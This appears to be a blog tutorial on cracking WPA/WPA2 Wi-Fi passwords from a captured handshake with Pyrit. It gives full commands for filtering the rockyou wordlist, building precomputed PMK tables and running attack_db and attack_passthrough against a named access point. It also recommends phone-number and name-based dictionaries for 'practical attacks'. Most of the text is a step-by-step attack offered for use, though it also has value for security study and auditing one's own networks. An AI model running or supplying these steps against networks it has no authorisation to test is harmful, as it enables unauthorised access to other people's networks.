Benefits of using Pyrit
Hacking captured handshakes is the only way to break WPA/WPA2 passwords. It is produced by the brute force method (brute force).
By the way, if you are not familiar with the handshake capture technique, then refer to the article “ Handshake Capture in Kali Linux ”.
Since the use of bruteforce does not guarantee a positive result, several techniques have been invented that can significantly increase the chances of success. These include:
- use of video cards for password selection (significantly increases the search speed)
- use of tables with pre-calculated hashes (increase in speed + reusability for the same access point, the ability to try dozens of handshakes from one access point in seconds)
- use of good dictionaries (increases the chances of success)
In Pyrit, you can use all these techniques – therefore, it is the fastest cracker of WPA / WPA2 passwords, or it is among the two of the strongest along with oclHashcat.
Other programs also implement these techniques. For example, in oclHashcat and in coWPAtty, dictionary scanning is implemented. CoWPAtty has a preliminary calculation of hashes (but there is no support for using graphics cards). oclHashcat allows you to use the power of video cards, but does not make a preliminary calculation of hashes. Looking ahead, I note that in oclHashcat you can implement a preliminary calculation of hashes and repeatedly use the data for one access point, to check several handshakes without increasing the time for calculation of hashes, as will be described later. Aircrack-ng goes through the dictionary and effectively uses multi-core processors, but does not use other “acceleration”.
On my system, oclHashcat does a brute force to crack WPA / WPA2 passwords at 31550 H / s, and Pyrit calculates hashes at 38000-40000 PMKs. Further testing of handshakes takes less than a second. From this it can be seen that even when checking one handshake, we increase the speed by about a third, and if we want to check several handshakes for one AP, then with oclHashcat everything needs to be started again. In Pyrit, every new handshake takes a split second.
In order for Pyrit to unleash all its power, you need to have proprietary drivers installed for the video card. with an AMD graphics card . or NVidia.
Fastest Hacking WPA / WPA2 Passwords
My raw data:
- attacked AP – DANIELLE2015
- the file, with a pre-grabbed handshake, is called DANIELLE2015-01.cap
WPA/WPA2 Hacking Dictionary
I will use the rockyou dictionary that comes with Kali Linux. For learning this is quite enough, and for practical attacks I can recommend generated dictionaries of phone numbers, generated dictionaries for specific AP of the form name_DT + numbers that fill in a passphrase of up to eight characters. Let’s copy the best dictionary file to the root directory.
cp /usr/share/wordlists/rockyou.txt.gz .
Unpack it.
gunzip rockyou.txt.gz
Since, as required, the minimum WPA2 password can be 8 characters, let’s parse the file to filter out any passwords that are less than 8 characters and more than 63 (in fact, you can just skip this line, this is entirely up to you). Thus, we will save this file as newrockyou.txt.
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
Let’s see how many passwords this file contains:
wc -l newrockyou.txt
There are as many as 9606665 passwords.
The original file contains even more.
wc -l rockyou.txt
There are 14344392 passwords. So we made this file shorter, which means we can test the AP in a shorter time.
Finally, let’s rename this file to wpa.lst.
mv newrockyou.txt wpa.lst
Create an ESSID in the Pyrit database
Now we need to create an ESSID in the Pyrit database.
pyrit -e DANIELLE2015 create_essid
ATTENTION: If there is a space in the name of the AP, for example, “NetComm Wireless”, then your team will be like this:
pyrit -e 'NetComm Wireless' create_essid
Smartly, we now have an ESSID added to the Pyrit database.
Import dictionary into Pyrit
Now that the ESSID has been added to the Pyrit database, let’s import our password dictionary.
Use the following command to import the previously created wpa.lst password dictionary into the Pyrit database.
pyrit -i /root/wpa.lst import_passwords
Create tables in Pyrit using the batch process
It’s easy, just type the following command.
pyrit batch
Since this operation is performed on the laptop, I have 38000-40000 PMKs. This is far from the limit – desktops with a good graphic card will help you to significantly increase the speed of these calculations.
You need to be careful how large your dictionary file is and how HOT is your processor and graphics card. Use additional cooling to avoid damage.
Hacking process with pyrit
We will use a handshake attack using a database of previously calculated hashes. After we completed all the necessary preparation steps, it became very easy to launch an attack. Just use the following command to start the hacking process.
pyrit -r DANIELLE2015-01.cap attack_db
That’s all. The whole process, including a preliminary calculation of the hashes, took a few minutes. It took less than a second to go through the entire database table to get the password, if it is present in the dictionary. My speed has reached 6322696 PMKs. This is definitely the fastest.
If the password could not be picked up, then immediately try the –all-handshakes option . Its essence is that not one is checked (the best handshake), but in general all available. The fact is that even the best handshake may be wrongly reconstructed. This will lead to the fact that the password is present in the dictionary, but the program will not be able to identify it. Therefore, to check all available handshakes, do this:
pyrit --all-handshakes -r DANIELLE2015-01.cap attack_db
It takes seconds – so you should always use it if the password is not found.
A handshake attack with a dictionary in Pyrit without using pre-calculated tables
If you don’t want to create a database, but want to directly search the dictionary file (which is much slower), you can do the following
pyrit -r DANIELLE2015-01.cap -i /root/wpa.lst attack_passthrough
The speed of this way? 17807 PMKs per second. For my taste it is much slower.
We clear Pyrit and a database
Finally, if necessary, you can delete your essid and do the cleaning.
pyrit -e DANIELLE2015 delete_essid
This will free up quite a lot of disk space.
Horrible font for the preformatted text. Grey outline and white on white background.